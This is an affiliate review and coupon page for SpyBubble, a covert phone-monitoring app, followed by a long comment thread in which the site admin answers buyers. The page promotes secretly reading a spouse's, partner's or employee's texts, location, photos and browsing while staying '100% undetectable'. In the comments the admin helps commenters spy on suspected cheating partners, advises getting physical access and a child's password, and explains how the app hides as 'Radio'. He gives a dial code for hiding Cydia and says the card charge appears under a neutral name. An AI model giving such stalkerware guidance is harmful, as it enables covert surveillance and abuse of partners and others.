SpyBubble Review – Spy Bubble Coupon Code

2012 February 13

SpyBubble ReviewAre you tired of not knowing what your employees, children, spouse, or significant other are up to? Are you suspicious and think they might be hiding something? If so, then SpyBubble might be the best solution for you.

SpyBubble is a cell phone spying software system that allows you to log in from any computer and monitor almost every smartphone which includes BlackBerry, iPhone, Windows Mobile, Android and Symbian OS smartphones. You install it on your family, friends, partners, or employees phones and everything on that phone can be traced right from your computer at home.

SpyBubble Reviews – SpyBubble includes the following spy features:

  • Call Tracking – This spying feature lets you view all incoming and outgoing call information. You will see call direction, phone number, date, and time of each call made/received on the Phone that has SpyBubble installed.
  • SMS Tracking – This SpyBubble sms spying feature lets you read all incoming and outgoing sms messages. This works even if the sms messages have been deleted. You will also get to see time, date and who or to whom the message was sent to.
  • GPS Location Tracking – Using this spy feature, you can secretly track any cell phone. You will get both current and historical tracking logs, with the results appearing on a map so you’ll know exactly where they are
  • Phonebook Access – SpyBubble lets you see EVERY phone number that’s registered on the memory of the phone!
  • Email Tracking – With Email Tracking SpyBubble will log each and every incoming and outgoing email in case they are trying to hide something via email.
  • URL Tracking – Spy Bubble logs all URLs the user has visited in the cell phone browser… you’ll be able to see if someone has been viewing something they shouldn’t be viewing!
  • Photo Tracking – This new SpyBubble feature will show you all the photos snapped on the cell phone. The photos are then uploaded to your SpyBubble account where you can then download them at any time.
  • 100% UNDETECTABLE – You can do all these spying without being detected! There is no sound, icon or anything at all in the target phone. No chance they will find out SpyBubble is on their phone. SpyBubble is 100% undetectable!

SpyBubble – How Does It Work?

The way it works is simple: Simply install the application directly onto the device and it starts every time the phone is turned on. The invisible application remains stealth and doesn’t show up in the running processes. Silently records EVERYTHING including full SMS messages, call info, GPS locations, web sites visited, contacts added and more. Logs are then sent directly to your spybubble account. This way, you can read the results at home on your computer or on your Smartphone while you’re away.

The spy bubble installation process is very quick and easy – Spybubble provides you with a download link. You enter that URL into your target phone’s web browser and it will automatically install a small application onto the phone. That’s it. You don’t need to have any technical knowledge to use it. Everything is step-by-step, illustrated, and easy for you to follow.

Spy Bubble Coupon Code For 2013 : 30% OFF

The regular price for the Spy Bubble Software (Lifetime License) is $149.95 which is on sale now for $49.95 (this is 66% discount). However, I have negotiated an additional 30% discount for my website’s visitors so you can get the Lifetime License for only $35. One time payment, no monthly fees or hidden costs.

** Update June 2013: Sorry, this offer has expired and all coupon codes are no longer valid. But spybubble is still on sale for $49 which is a great deal. To purchase visit: http://www.spybubble.com/cell-phone-spy.php

Here’s How to Get This Great Deal:

1) Simply click on this DISCOUNT link will take you to the Spy Bubble order page in 2 seconds to get you started!

2) Enter the coupon code “spy30” in the coupon code box and then hit the “Recalculate” button to receive your discount. You will then see the words “30% off for spybubblereviewscam.com users” appear next to the box and you can proceed to enter your payment details. (Remember, this offer is for a LIMITED time only.)

SpyBubble Discount Code

Here’s What You Should Do RIGHT NOW!

  1. Register with SpyBubble
  2. Pay the one time fee of $35 (Add SpyBubble Priority Customer Support for $9.95)
  3. Login to the members area
  4. Install SpyBubble onto the desired phone/s
  5. Start Spying!

Can This Be Used On All Phones?

SpyBubble works extremely well on the majority of new popular phones including all BlackBerry, iPhone, Android os, and Symbian (most Nokia, Sony, and Samsung) phones. It works with almost any smartphone.

Does SpyBubble Work In My Country?

SpyBubble works in any part of the world and support all languages. If you can use a smartphone in your country, you can install SpyBubble on it and monitor it.

How Do I Receive The Software?

In order to use spybubble services you need to sign-up (Click here). Once your purchase is complete you’ll receive an email with all of your account details, including the website address to download the software from. You can download the software directly into the Target phone at any time. Please make sure that email from spybubble are not sent to your junk or spam folder.

SpyBubble Reviews –  Conclusion

Overall, SpyBubble is a great product for monitoring mobile phone usage and activity. It lets you do everything it claims and truly goes undetected. The good thing is if for some reason you’re not fully happy with Spy Bubble, you may return it for a full money back guarantee. So there’s nothing to lose.

Last Word

I hope you’ve found this Spy Bubble Review helpful! If you’re using SpyBubble at this time and want to share your experience, you can review SpyBubble or submit your testimonial here. Your feedback can help someone else to decide. Thanks!

If you’re looking for reviews of the spybubble phone spy software, find them below. The spybubble reviews and comments are from real users. Please do ask to clarify any uncertainties and all suggestions and comments are most welcomed. Just leave comment and I’ll try to make response ASAP.

Happy Spying!

84 Responses
  1. Elsa permalink
    October 23, 2010

    Is there a way to install spybubble software on a mobile device from a remote location? My good friend isn’t very tech savvy and really wants to understand how she can spy on her fiance’s phone usage (sms, incoming and outgoing call etc.) without physically installing software on the phone. She is afraid he is cheating and wishes peace of mind before they get married at the end of the summer. Any help would be appreciated!

  2. admin permalink*
    October 24, 2010

    Hello Elsa,
    I should be honest to say no, you’ll need physical access to the phone to actually install the software. Remote installation is usually not possible, nor is it recommended. But as soon as you install it, the software works in the background and you will access the call logs remotely.

    Thanks and have a great weekend,
    Mike

  3. Chris permalink
    October 25, 2010

    Does anyone have any experience with spy software for mobile phones? I suspect my husband is having an affair. He guards his mobile phone with his life so I am searching for something that I would not have to physically access his phone with.

  4. admin permalink*
    October 26, 2010

    Hello Chris , SpyBubble is the best for you. It also works with Google Android, Nokia Symbian and the current generation of iPhone. SpyBubble has a reputation of keeping track of calls made and SMS messages sent through any phone (needn’t be Blackberry, can be any GSM phone). It also helps in telling you someone’s location all over the world.

    Thanks,
    Mike

  5. Heddy permalink
    November 6, 2010

    Hello, I want to place an order yet it is 39.95 total on your site today and you are wanting me to pay 59.95, it shows I have an order pending and I cannot delete it. Please let me know what’s up?

  6. admin permalink*
    November 7, 2010

    Hello Heddy,

    Thanks for taking time to contact me. After you click on the DISCOUNT link You will be automatically redirected to discount order page in about 5 seconds and use another email for order.

    Best regards,
    Mike

  7. angie permalink
    November 11, 2010

    Hey, I was just wondering if the $29.95 is per phone line?
    Thanks, Angie

  8. admin permalink*
    November 11, 2010

    Hi Angie,

    Thank you for your comments. Please be assured that the $29.95 allow you to track an UNLIMITED number of phones! Feel free to use spybubble on as many phones as you would like, and it still costs the same discount price! Enjoy, That’s it!

    Thanks again and have a great day,

    Mike

  9. joe permalink
    December 7, 2010

    can i use diferent company service on sender y targe

  10. admin permalink*
    December 8, 2010

    Yes of course, joe.

  11. Michel permalink
    December 16, 2010

    Why does many web sites show spybubble at 29$ and when you click it say 39$ (and some 59$)??

  12. eve permalink
    December 17, 2010

    Hey, i just ordered spy bubble on nov 30 and paid $69.90.. i haven’t even used this product yet bcuz i’m waiting for my significant other to come visit so i can install. how can i get a refund or credit so i can get at this low online price of $29.95??

  13. admin permalink*
    December 18, 2010

    Hi Michel,
    Yes, it is sales promotion from spybubble. My mission is just offering best purchase method which could save your money so that you can buy the spybubble only $29.95!

  14. Shariq Ahmed permalink
    January 19, 2011

    Hi, I already subscribe spububble for 10 days and what I observe is that there is no outgoing messages record in it the target phone is still in my hand kindly help to sought this problem. I have already mail to the technical departmnet but still there is no response . The target phone is NOKIS-E71 AND MY Order Number is WMSZBMVE
    kindly see the matter ASAP.
    Thanks

  15. Shariq Ahmed permalink
    January 19, 2011

    I am using 10 days trial version of spybubble and it really works great all Awesome technology even I can watch my Target Phone Location through there GPS technology. SPYBUBBLE guys works good Thumbs up to all the team member

  16. admin permalink*
    January 21, 2011

    Hello Shariq, Thank you for your feedback!

  17. Shariq Ahmed permalink
    January 21, 2011

    Hi, Today I purchased the software spybubble but you guys debited 59.90$ from my credit card how come it happens when you asked for 39.90$ secondly is this the one time payment or a quaterly payment. kindly let me know thanks

  18. admin permalink*
    January 22, 2011

    Hi Shariq,

    1. After you click on the DISCOUNT link. Please wait for a few seconds while you are being redirected to the discount order page.

    2. Free updates + NO monthly payments or hidden fees. ONE TIME FEE!

  19. Shariq Ahmed permalink
    January 22, 2011

    Hi, but the amount 59$ has been already debited from my account are you giving me back the remaining amount.?

  20. Steffny Jones permalink
    January 26, 2011

    I have read your reviews and interested in spybubble software what I want to know is the one time fee $39.90 discount offer is still on..? let me know so that I can buy it. How do I create my account ?

  21. admin permalink*
    January 30, 2011

    Hello Steffny,

    1) Yes the discount is still available!

    2)
    a. Register with SpyBubble
    b. Pay the one time fee of $29.95 (Add SpyBubble Priority Customer Support for $9.95)
    c. Login to the members area
    d. Install SpyBubble onto the desired phone/s
    e. Start Spying!

    That’s it!

  22. Susan permalink
    February 4, 2011

    Why am I being charged 59.95 quartly??? w/ a free 7 day trail period.

    When this ad states “Pay the one time fee of $29.95 (Add SpyBubble Priority Customer Support for $9.95)”

  23. admin permalink*
    February 5, 2011

    Hello Suscan,

    Click on the DISCOUNT link: http://discount.spybubblereviewscam.com/ , and use another email for order.

    Thanks
    Mike

  24. April 8, 2011

    Hi,

    I want to know what IMEI is and how do I find it on a Blackberry Storm? I read somewhere that if the IMEI are not the same , it won’t work!

  25. Kara permalink
    May 25, 2011

    Does the target phone require internet access?

  26. admin permalink*
    June 4, 2011

    Yes! You must have Internet access on the phone and use its own browser to connect to spybubble website and download the software directly into the phone. The process is not difficult and the online manual offers step by step instructions with screenshots.

  27. Terri permalink
    July 6, 2011

    Hi—I have a question….I need to put tracking on my minor childs phone but do not have her password. Am I going to need it to gain access with a password or is the MEID# or some other # on the back of the phone sufficient. Please let me know asap!! Thanks!! Terri

  28. admin permalink*
    July 7, 2011

    Hello Terri, my advice is to find ways to get her password. because you must install the software directly on the target’s cell phone.

    Here is a quick overview of the basic steps.
    1. You find a way to get your hands on the target’s cell phone.
    2. Then you fire up the cell phone’s web browser,
    3. Enter the URL provided to you by SpyBubble.
    4. Download the software, install, & configure.

    Good Luck!

    Mike

  29. stan permalink
    July 9, 2011

    does spy bubble work on an LG enV Touch?
    The tools menu shows VX11KV11 for the software version

  30. admin permalink*
    July 9, 2011

    Hello stan, SpyBubble supports the following operation systems. If your target’s phone is running these OS, Spy Bubble will work.

    1. BlackBerry OS 4.2.1 or higher
    2. Android 1.0 or higher
    3. Symbian S60 3th Edition, 3th Edition Feature Pack 1, 3th Edition Feature Pack 2 and 5th Edition Phones
    4. iPhone OS 2.x, 3.x and 4.x
    5. Windows Mobile 5.x and 6.x

    Thanks!

  31. stan permalink
    July 10, 2011

    thanks,
    however I think the LG does not have an OS sa far as I can tell,
    It can download apps and access the internet..

    The LG enV Touch is from verizon.
    Is there a way to verify if it would work?

  32. Diego permalink
    July 21, 2011

    Just my opinion based on my experience.

    The installation is not that difficult. The problem is that you really have to have some time and be relaxed. If you take someone’s phone “just to make a call” or for 5 minutes, then you’re going to be very nervous (I know I was) and you’re much more likely to make a mistake. I advise you to be prepared to spend at least 15 minutes so you don’t have to install it in a hurry and can take your time to read and follow the instructions carefully.

  33. admin permalink*
    July 22, 2011

    Thanks Diego for sharing your experience with us here, I appreciate it!

  34. komang permalink
    July 24, 2011

    how to use new features : Email Tracking, Url Tracking, Photo Tracking.
    i’m not see menu on site .

    thanks

  35. rachel permalink
    July 25, 2011

    Everything has worked great so far except url tracking…It doesnt even show up as a menu item. I there a reason for this? This was my area of concern for the target phone.

    Thank you-

  36. Aspy permalink
    July 26, 2011

    How do I listen to live calls and use phone as a microphone on anroid type phones such as evo or motorola xprt or does that only work on certain phones?

    I get only get below:

    Call Details
    SMS Details
    GPS Details
    Cell Location Details
    Photo Details
    URL Details
    Phonebook

    I would like to be able to listen to calls and use phone as microphone. Please email me the instructions on how to set that up thanks.

  37. admin permalink*
    July 26, 2011

    Hello Aspy,

    Thank you for your comment. I’m sorry but spybubble doesn’t support listen to live calls. If you want the top of the line, most powerful (real secret agent stuff) phone spy software on the market. I’d recommend MobiStealth (http://www.mobistealthreviews.net) to you. MobiStealth enables you to secretly listen to calls – both incoming and outgoing. While this is a little more expensive than the rest of the pack, it’s worth every single penny.

    To your spying success!
    Mike

  38. Umang permalink
    August 4, 2011

    Dear sir
    i m using n73 in india.
    Software work on it ?
    What requair target phone verson ?
    Work on cdma ?

  39. admin permalink*
    August 5, 2011

    Yes umang, spybubble works on Nokia N73. Basically, an Internet connection is all you really need, as long as the target phone has an Internet connection to upload the captured data to the web account, and as long as it can make and receive standard SMS and phone calls to/from the monitor phone, everything will work in all countries.

  40. wemdy permalink
    August 30, 2011

    if the person with the target phone goes into manage applications will he find spybubble and what will it appear as on his phone and what happens if he deletes it.

  41. admin permalink*
    August 31, 2011

    Hi Wemdy,

    It will appear that the “radio” in the list of applications on his phone. SpyBubble will stop working if he deletes it.

    Remember, SpyBubble is the phone spy software that is completely untraceable and undetectable by the target. the SpyBubble team know that the information that you are looking for is extremely sensitive and that’s why they went to great lengths to test their software in every circumstance imaginable in order to make sure that you have an extremely effective and completely discreet tool at your disposal.

    Thanks,
    Mike

  42. Joe permalink
    September 11, 2011

    Hi, I was wondering if the GPS function will drain he target phones battery? Does this software put a battery strain on the target phone?Can any of the functions be turned off like the GPS or HTML logging?

  43. admin permalink*
    September 11, 2011

    Hi Joe, I’m not sure that it would drain it.. but I have left the GPS on all day and didn’t see that much of a difference. The drain was minimal.

    Currently, you cannot disable all of these functions/features because spybubble doesn’t support it yet. but it will soon!

    Thanks and have a nice day,
    Mike

  44. lisa permalink
    September 16, 2011

    Can this program be used to look at even deleted messages? You know, messages that were deleted BEFORE the program was installed?

  45. admin permalink*
    September 16, 2011

    Hi Lisa, Once you’ve installed the program you can easily monitor every single SMS message – even if the SMS messages are deleted as soon as they’re read.

  46. Confused permalink
    September 16, 2011

    Mike, I am just trying to understand the answer that you gave Wemdy. What do you mean when you say: it will appear that the “radio” in the list of options.? Are you saying that it makes an icon, or a clickable option on the target phone? If yes, what does it look like and what displays after being clicked? Thank you!

  47. admin permalink*
    September 16, 2011

    Hi,

    There will not be any icons to show people that spybubble has been installed on the device. However, once you’ve installed SpyBubble, a “Radio” will show on your applications list.

    Here’s an example of what it should look like:

    SpyBubble iPhone

    What displays after being clicked:

    SpyBubble iPhone

    Good luck!
    Mike

  48. Amanda permalink
    October 8, 2011

    Does this work on any cell phone? say like Straight Talk?

    Thanks,

  49. admin permalink*
    October 8, 2011

    Hi Amanda,

    SpyBubble currently supports BlackBerry, iPhone, Android, Symbian/Nokia and Windows Mobile phones.

    Thanks,
    Mike

  50. MIke permalink
    October 15, 2011

    Hi, I’m just wondering how do I get to that $29.95 offer page?
    And I also have a question. What if my girlfriend has HTC Incredible but no internet but she is using Wi-Fi as her internet. Can I still do it?

  51. admin permalink*
    October 15, 2011

    Hi MIke,

    Yes, you can connect to Wifi to get Internet access. However keep in mind that if you only have Wfi access, then logs won’t be able to upload until another Wifi connection is made.

    The $29.95 discount offer is no longer available. Here is the latest spybubble coupon code that will give you the best discount: http://www.spybubblereviewscam.com/spybubble-coupon-code/

    Thanks,

  52. Mrs. Ruiz permalink
    October 26, 2011

    Hello im trying to buy this but I had one question? What if I have the supported phones and my husband doesnt?

  53. admin permalink*
    October 26, 2011

    Hi, spy bubble must be installed on the target phone, you do not need to install anything on your own phone. so please make sure that your husband has a compatible phone before you confirm your purchase.

  54. Mrs. Ruiz permalink
    October 26, 2011

    Thank you!

  55. nana permalink
    November 21, 2011

    I have just bought spybubble product and want to install to my Samsung Galaxy Young, but I can not find that Phone Model in your List.
    Please give me detail guidance on how to install your software to that phone.

    Thanks

  56. admin permalink*
    November 22, 2011

    Hi Nana,

    As samsung galaxy young running android, you can select “Android” from the operating system menu and follow on-screen instructions.

    Thanks!

  57. sona permalink
    December 9, 2011

    hi. i wanna to buy spy bubble. i have some queries.
    is the payment of $49 is one time or quarterly billing??? i have read somewhere that @49 is one time payment for registration and after that you will have to pay monthly fee.
    is any discount still there?
    will spy bubble also works on 3G network???
    if for some reason spy bubble does not work will you refund the charged money????

  58. admin permalink*
    December 12, 2011

    Hi Sona,

    1) The cost of SpyBubble is only ONE-TIME fee of $49.95 for lifetime and you will still get all future updates for free.

    2) Here is the latest spybubble coupon code that will give you the best discount: http://www.spybubblereviewscam.com/spybubble-coupon-code/

    3) Yes. it works on 3g network.

    4) Yes. SpyBubble comes with a 60-day money-back guarantee, so getting this product is practically risk-free. The 60-day period should be a long enough duration for you to test whether this product is right for you or not.

    Thanks!

  59. Bev permalink
    December 16, 2011

    Does the charge show up as spy bubble on the credit card charge? My husband pays the bills!

  60. admin permalink*
    December 18, 2011

    PLI*CHARGES will appear in your credit card statement, which is largest retailer of digital products.

  61. jep permalink
    January 9, 2012

    hey i have two questions:

    does spybubble have anything to do with the country we’re in? im not in the USA

    do i need somekind of cable (from phone to computer) to install the software on the phone id like to spy on? its a blackerry curve

  62. yoyo permalink
    January 17, 2012

    when do i enter the imei number? and how do i see the url, email, sms, etc. the only thing showing so far is the phonebook and a cell location that wont open

  63. paula permalink
    January 19, 2012

    Can spybubble retrieve messages that were deleted before the install? Someone asked this question earlier with no clear answer…or can u only see messages and activity that occured after install

  64. January 21, 2012

    can i install spybubble for free i need it very mush so that i can trace my son

  65. Kory Arceneaux permalink
    January 26, 2012

    Look I bought spybubble and I wanted to up date it with the video soft ware and now when I try to log in my account it says it can’t open the safari because it Has to many redirects occurred I need help please I can’t log in my account

  66. January 27, 2012

    I was under the impression that we had the opportunity to listen to recordings of calls.
    Found this on another site…
    This is a list of all the features available on SpyBubble Software:
    Record Calls – This SpyBubble feature allows you to listen to calls that are made/received on the Android cell phone.
    Remote Monitoring – Remotely turn on your spouse’s Android cell phone and listen to the surroundings with this SpyBubble phone spyware feature.
    Real Time Stealth GPS Tracking – With this SpyBubble feature, you can secretly track the location of your spouse and keep an eye on their every move.
    Retrieve Deleted Text Messages – All text messages which are received or sent from the Android cell are recorded, so you’ll also have a copy. Also, full contents of each message are recorded along with the time and date the text message was sent/received.
    Secretly View Call Logs – This SpyBubble feature lets you discover all incoming and outgoing call information on the phone. Furthermore, the contact stored in the cell phone’s contact list / address book that is assocated to the number in the call logs is going to be shown.

    So I’d love to know how to use the remote monitoring and recording calls. Any help would be greatly appreciated!!

  67. March 9, 2012

    HELLO I HAVE BEEN USING SPYBUBBLE FOR MONTHS NOW AND ITS WORKED LIKE A DREAM ITS AMAZING!! I JUST PURCHASED “NOTIFY ME” FROM THEM TO UPGRADE MY ACCOUNT AND NOW I CAN’T EVEN LOGIN… WHAT GIVES??

  68. Lydia permalink
    March 9, 2012

    Hey I tried loginning yesterday and today and spybubble will not let me login its like it they delelted my account. I was going to contact them but I dont have order number cuz i think they removed my account. I have had this for two years now. What is the deal how can I get in touch with them? thank you.

  69. admin permalink*
    March 9, 2012

    Hi everybody! I have just received the following email message from SpyBubble Support:

    Hello,

    We were experiencing a technical issue from server side, which is now solved. Logs are not affected during this time.

    You can ask customers to login to member’s area from http://cp.spybubble.com/userlogin.php

    We apologize for the inconvenience caused.

    –SpyBubble Support

  70. Admin I need advice permalink
    March 11, 2012

    Admin, once the radio is installed, in cydia the radio is still listed in the sources tab with url path. How do I get rid of the radio source in the sources tab without hurting the install? Please help, the instruction page to do this on their site is not working.

  71. admin permalink*
    March 12, 2012

    Hi,

    If you want to hide the Cydia icon from the target phone just dial 912313 and wait for few seconds. If you don’t want to hide Cydia, you should remove the radio source from the cydia.

    Here is a guide on How To Manually Delete Or Remove Broken Sources Or Repositories From Cydia:
    http://www.ijailbreak.com/applications/how-to-manually-delete-broken-sources-from-cydia/

  72. betty permalink
    March 13, 2012

    does spybubble with live call work on lg 420g phones?

  73. March 17, 2012

    Does spybubble work on straight talk phones??? the samsung please let me know asap thanks

  74. Patty permalink
    March 21, 2012

    The target phone is a Samsung galaxy prevail & when I tried installing it wouldn’t allow. Please help.

  75. superman permalink
    March 22, 2012

    if the iphone that i want to spy is not been jail break can i still spy the phone?

  76. March 22, 2012

    is the phone need to jailbreak only can install the spy bubble?

  77. greg permalink
    March 23, 2012

    i am wondering why i am unable to pay with a visa gift card. I have verified that the funds are there…..if it is a one time fee, there shouldn’t be a bank issue…….should it?

  78. admin permalink*
    March 23, 2012

    The issue with using Visa (or any other Bank Issued) gift card online is that there is no verifiable address associated with the card. When buying things online, most merchants want your billing address to match the address on the card you are using.

    To be able to use the gift card online, Visa recommends that you go online to register your gift card with the merchant/financial institution that issued it and add your name and address to the card so that when you use it online, the card will match the name and address you provided for billing.

  79. Jose permalink
    April 3, 2012

    Hello admin please HELP. All I have from my target phone is an MEID number, its an LG Optmusso its a supported device but my question is how do I get this working with an MEID and not a IMEI or is their a converter? Please help very urgent thank you!

  80. admin permalink*
    April 3, 2012

    For android phone, you don’t need imei number. All you need to do is follow the Step-by-Step instructions in the member’s area.

  81. brian permalink
    April 10, 2012

    hello admin I just want to ask if spy bubble is applicable for the new iphone4s i just want to know the answer thank you so much..I will wait you reply thank you,,..

  82. admin permalink*
    April 10, 2012

    Hi Brian! Yes it works on the iPhone 4s.

  83. Mike permalink
    April 16, 2012

    Hey can anyone help me I’ve been using this software for about 2 months all of a sudden I try to sign in and its as if I never made an account more payed

  84. admin permalink*
    April 16, 2012

    If you are still having problems signing in to SpyBubble member area, don’t hesitate to contact spybubble support at support#spybubble.com. Please include your registered email address in your email.

Comments are closed.